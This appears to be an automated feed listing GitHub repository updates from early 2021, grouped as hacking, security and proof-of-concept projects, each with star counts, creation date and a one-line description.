Faelian updated Formation-CAD170. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-25. --- Materials and notes for the Hacking level 1 training - CAD 170

danielebruneo updated remarkable2-hacks. This repo has 8 stars and 2 watchers. This repo was created on 2021-01-25. --- A collection of hacks, mods, tools, tips & tricks, specifically focused on the Remarkable 2

aigars-github updated blacklist. This repo has 0 stars and 1 watchers. This repo was created on 2020-10-24. --- IPs from which scanning, spamming or hacking attempts were detected

Roboy updated esp-wheelchair. This repo has 0 stars and 2 watchers. This repo was created on 2020-12-05. --- Wireless control hack for the Roboy wheelchair

w1th0ut updated red-ocean. This repo has 1 stars and 0 watchers. This repo was created on 2019-05-18. --- This is my first program, for simple hacking activity, made by simple python2 code, hope you enjoy :)

Jinseop-Sim updated Web-Hacking-Study. This repo has 1 stars and 1 watchers. This repo was created on 2021-01-08. --- None

dwvicy updated hack. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-23. --- hack.dscrait.tech

dannieldev updated Fundamentos-de-React. This repo has 0 stars and 1 watchers. This repo was created on 2020-07-03. --- 🚀React.js exercises from Zero to Pro.. Hacker.. Master

----Security Updates----

forward3d updated garrison. This repo has 22 stars and 11 watchers. This repo was created on 2018-06-12. --- Security, Compliance and Informational Dashboard System

mozilla updated foundation-security-advisories. This repo has 12 stars and 21 watchers. This repo was created on 2014-07-03. --- Canonical source for Mozilla Foundation Security Advisories. http://www.mozilla.org/security/announce/

linux-mailinglist-archives updated linux-security-module.vger.kernel.org.0. This repo has 0 stars and 0 watchers. This repo was created on 2019-07-01. --- None

EvgeniyMay updated spring-security-accout-system. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-26. --- Spring security account system

staaankey updated PasswordSecurity. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-26. --- None

OpenCTI-Platform updated opencti. This repo has 1485 stars and 87 watchers. This repo was created on 2018-12-17. --- Open Cyber Threat Intelligence Platform

ZestProjects updated linux. This repo has 0 stars and 0 watchers. This repo was created on 2021-01-26. --- Zest Projects' fork of the Linux kernel. Full LLVM build support is included with patches for features such as Zero Stack Initialisation and Polly, along with improvements to performance and security.

pucherot updated Pi.Alert. This repo has 124 stars and 14 watchers. This repo was created on 2021-01-05. --- WIFI / LAN intruder detector. Check the devices connected and alert you with unknown devices. It also warns of the disconnection of "always connected" devices

arkime updated arkime. This repo has 4586 stars and 362 watchers. This repo was created on 2012-07-06. --- Arkime (formerly Moloch) is an open source, large scale, full packet capturing, indexing, and database system.

JavaGarcia updated Neanet. This repo has 3 stars and 1 watchers. This repo was created on 2020-08-02. --- Threat intelligence

insidersec updated insider. This repo has 189 stars and 11 watchers. This repo was created on 2019-11-12. --- Static Application Security Testing (SAST) engine focused on covering the OWASP Top 10, to make source code analysis to find vulnerabilities right in the source code, focused on an agile and easy to implement software inside your DevOps pipeline. Support the following technologies: Java (Maven and Android), Kotlin (Android), Swift (iOS), .NET Full Framework, C#, and Javascript (Node.js).

complexorganizations updated wireguard-manager. This repo has 343 stars and 25 watchers. This repo was created on 2020-04-14. --- ✔️ Self-hosted Wireguard Manager

Mixeway updated MixewayFrontend. This repo has 4 stars and 3 watchers. This repo was created on 2019-11-29. --- Mixeway is security orchestrator for vulnerability scanners which enable easy plug in integration with CICD pipelines. MixewayFrontend contains source code of GUI created in Angular 8 and based on ngxadmin framework.

jainara1012 updated security_plus. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-15. --- None

Mixeway updated MixewayBackend. This repo has 8 stars and 3 watchers. This repo was created on 2019-11-29. --- Mixeway is security orchestrator for vulnerability scanners which enable easy plug in integration with CICD pipelines. MixewayBackend project contains source code of backend with all plugin integrations written in Spring Boot.

SHolzhauer updated elastic-tip. This repo has 11 stars and 3 watchers. This repo was created on 2020-10-10. --- Elastic TIP is a python tool which automates the process of aggregating Threat Intelligence and ingesting the intelligence into a common format into Elasticsearch with the main goal of being used by the Security solution.

Hack23 updated securityfixerbot. This repo has 0 stars and 1 watchers. This repo was created on 2020-11-18. --- None

vituperative updated i2pplus. This repo has 1 stars and 1 watchers. This repo was created on 2020-06-12. --- I2P+ is a soft-fork of the Java I2P Anonymizing Network Layer - this is a mirror of https://gitlab.com/i2pplus/I2P.Plus/

OpenZeppelin updated openzeppelin-contracts. This repo has 9049 stars and 470 watchers. This repo was created on 2016-08-01. --- OpenZeppelin Contracts is a library for secure smart contract development.

github updated codeql. This repo has 1947 stars and 81 watchers. This repo was created on 2018-07-31. --- CodeQL: the libraries and queries that power security researchers around the world, as well as code scanning in GitHub Advanced Security (code scanning), LGTM.com, and LGTM Enterprise

leonlatsch updated Photok. This repo has 41 stars and 7 watchers. This repo was created on 2020-08-12. --- Encrypted Photo Safe for Android

secman-team updated secman. This repo has 1 stars and 1 watchers. This repo was created on 2020-12-27. --- secman is a password manager built by go

TankerHQ updated sdk-native. This repo has 15 stars and 7 watchers. This repo was created on 2018-12-03. --- Tanker C++ / C encryption SDK

Skyscanner updated cfripper. This repo has 258 stars and 10 watchers. This repo was created on 2018-07-02. --- Library and CLI tool for analysing CloudFormation templates and check them for security compliance.

I3anx updated M183_Wildi_Orakci_Backend. This repo has 1 stars and 2 watchers. This repo was created on 2020-12-02. --- Security Application for Modul 183 gibb

----PoC Updates----

codesandtags updated poc-blog. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-25. --- This is a Proof of Concept, about how to create microservices using NodeJS, Express and React. This project contains a monorepo which represents the microservices to manage a blog website.

kevcodez updated gotrue-kt. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-24. --- Kotlin Client for GoTrue API (Proof of concept/WIP)

sweetpi updated node-module-compiler. This repo has 0 stars and 2 watchers. This repo was created on 2015-02-11. --- Some proof of concept stuff for cross compiling npm modules

pantherNZ updated GameChallenge. This repo has 0 stars and 1 watchers. This repo was created on 2020-06-05. --- Ultimate Game Challenge - Prototype / Demo / Proof of Concept

lemaitre updated dsurcu. This repo has 0 stars and 1 watchers. This repo was created on 2020-12-14. --- Proof of Concept for a Dead-Simple Userspace Read-Copy-Update implementation.

swiss-territorial-data-lab updated regbl-poc-analysis. This repo has 0 stars and 0 watchers. This repo was created on 2021-01-21. --- Analysis script and tools for the proof of concept for the Registry of building (RegBL) completion

Ch-sriram updated node-js-deno. This repo has 0 stars and 1 watchers. This repo was created on 2020-11-19. --- Proof of Concept: NodeJS & Deno. Repository contains concepts and code related to Node JS [Vanilla Node, Express Framework, REST APIs, GraphQL, Websockets & more] & Deno.

dinosaure updated paf-le-chien. This repo has 12 stars and 3 watchers. This repo was created on 2020-02-02. --- Port of HTTP/AF with Mirage and Tuyau (Proof Of Concept)

abaplint updated transpiler. This repo has 20 stars and 6 watchers. This repo was created on 2020-02-26. --- Proof of Concept - Very much work in progress

uma-email updated poc. This repo has 0 stars and 1 watchers. This repo was created on 2020-09-28. --- A proof of concept Authorization-Enhanced Mail System

swissarmysam updated signal-nui. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-10. --- A proof-of-concept natural user interface (NUI) using hand gestures and voice to control a video streaming website.

ajiniesta updated multiemail. This repo has 0 stars and 1 watchers. This repo was created on 2015-11-24. --- Proof of Concept for emailing in JavaFX 8

jwilk updated docbook-xsl-mitm. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-25. --- proof-of-concept mitmproxy script to infect DocBook XSL stylesheets

toop6iho updated toop6iho.github.io. This repo has 0 stars and 0 watchers. This repo was created on 2020-10-01. --- Subdomain Takeover Proof of Concept Site

Immueggpain updated forwardproto. This repo has 2 stars and 3 watchers. This repo was created on 2018-08-14. --- A naive forwarding protocol. This is a proof of concept (PoC).

gokulprathin8 updated vanilla-redux-poc. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-26. --- React-Redux Proof of Concept.

joshuajung updated 116117bot. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-26. --- A proof of concept bot, checking impfterminservice.de for available COVID-19 vaccination appointments.

contriteobserver updated RajawaliAssimpBridge. This repo has 0 stars and 1 watchers. This repo was created on 2020-11-19. --- A proof of concept integration between Rajawali and the Open Asset (Assimp) Import Library

EticaAI updated HXL-Data-Science-file-formats. This repo has 2 stars and 2 watchers. This repo was created on 2021-01-24. --- [public draft][Proof of concept] Common file formats used for Data Science exported from HXL (The Humanitarian Exchange Language)

bjmcternan updated autonav_proof_of_concept. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-22. --- None

matale14 updated Writeups. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-07. --- All my writeups. CTF's, Proof of Concepts, Projects.

Monkatraz updated mainframe. This repo has 0 stars and 1 watchers. This repo was created on 2020-10-01. --- An unofficial proof-of-concept for the SCP-Wiki.

jzohdi updated image-upload-poc. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-10. --- This is a proof of concept project where a user will be able to create an image gallery accepting real time image uploads.

ascent12 updated wlx. This repo has 1 stars and 2 watchers. This repo was created on 2021-01-25. --- Proof-of-concept Wayland Compositor Library

ryanlsmith142 updated service-dog-registry. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-04. --- A proof of concept built with the MERN stack.